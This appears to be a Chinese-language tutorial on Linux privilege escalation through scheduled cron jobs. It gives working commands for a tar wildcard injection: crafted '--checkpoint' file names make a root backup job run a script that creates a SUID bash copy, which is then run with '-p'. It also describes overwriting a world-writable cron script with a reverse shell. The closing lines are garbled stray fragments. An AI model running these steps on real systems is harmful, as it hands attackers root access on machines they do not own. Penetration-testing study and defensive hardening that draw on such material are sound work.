免責聲明:本文僅做技術交流與學習...
目錄
定時任務 打包配合 SUID-本地
原理:
背景:
操作演示:
分析:
實戰發現:
定時任務 文件權限配置不當-WEB&本地
操作演示:
定時任務 打包配合 SUID-本地
原理:
提權通過獲取計劃任務執行文件信息進行提權 .
1、相對路徑和絕對路徑執行
2、計劃任務命令存在參數調用
利用計劃任務的備份功能 tar 命令的參數利用 .
(大部分為本地提權)
背景:
定時任務-->
背景:
運維為了防止數據丟失等,寫個定時任務進行數據的打包壓縮.
由于數據打包壓縮tar命令.
tar可以嘗試加參數調用其他命令執行
cd /tmp;tar czf /tmp/backup.tar.gz*
來到tmp目錄壓縮成backup.tar.gz(當前所有)--(網站和數據庫經常進行備份,tar壓縮---隔段時間進行打包.)
操作演示:
#tar--checkpoint=1調用其他命令執行
echo "" > --checkpoint=1
echo "" > "--checkpoint-action=exec=sh test.sh"
echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > test.sh
chmod +x test.sh
#創建好文件之后把定時任務開起來.
---文件弄好之后,把定時任務開起來--->
--等待定時任務的運行(打包)
-->得到壓縮文件和一個bash文件(test.sh沒有運行.)
./bash 命令怎么執行呢??? 多加個 -p 參數.
./bash -p
分析:
實戰發現:
查看定時任務有沒有可利用(tar打包壓縮).
定時任務 文件權限配置不當-WEB&本地
--就是權限配置不當,其他的低權限可以調用,執行等等.
利用不安全的權限分配操作導致的定時文件覆蓋
chmod 777 775 等 所有者 組 其他成員說明
操作演示:
--定時任務里添加vim /etc/crontab111.sh < ps(或反彈命令)./111/sh? 發現沒權限執行 ---chmod +x后才可以.(因為需要權限啊,)所以:
如果root用戶給文件 777 的權限,那么其他用戶和組都能動他了.
改完之后,(寫個反彈命令)
--當文件被計劃任務調用的時候就上線了.
)
)
)
 - consider wiping your data dir)
)